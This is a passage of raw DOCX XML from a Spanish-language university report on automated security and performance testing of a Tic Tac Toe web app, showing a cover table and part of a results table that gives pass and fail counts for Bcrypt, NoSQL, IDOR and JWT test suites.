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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="003DA5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Instituto Tecnológico de Costa Rica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="003DA5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Escuela de Ingeniería en Computación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas Automatizadas de Seguridad y Rendimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tic Tac Toe Game — MERN-T Stack</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:left w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:right w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Curso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aseguramiento de Calidad de Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Grupo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Estudiante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Docente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Marcos Rodriguez Ovares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fecha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3/6/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Herramientas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="D6E4F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Jest v29 + Supertest · Artillery v2.0.32 · mongodb-memory-server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen de Resultados</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:left w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:right w:val="single" w:color="1F4E79" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aprobados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fallos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Defectos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-01 (Bcrypt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-02 (NoSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-03 (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-04 (JWT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
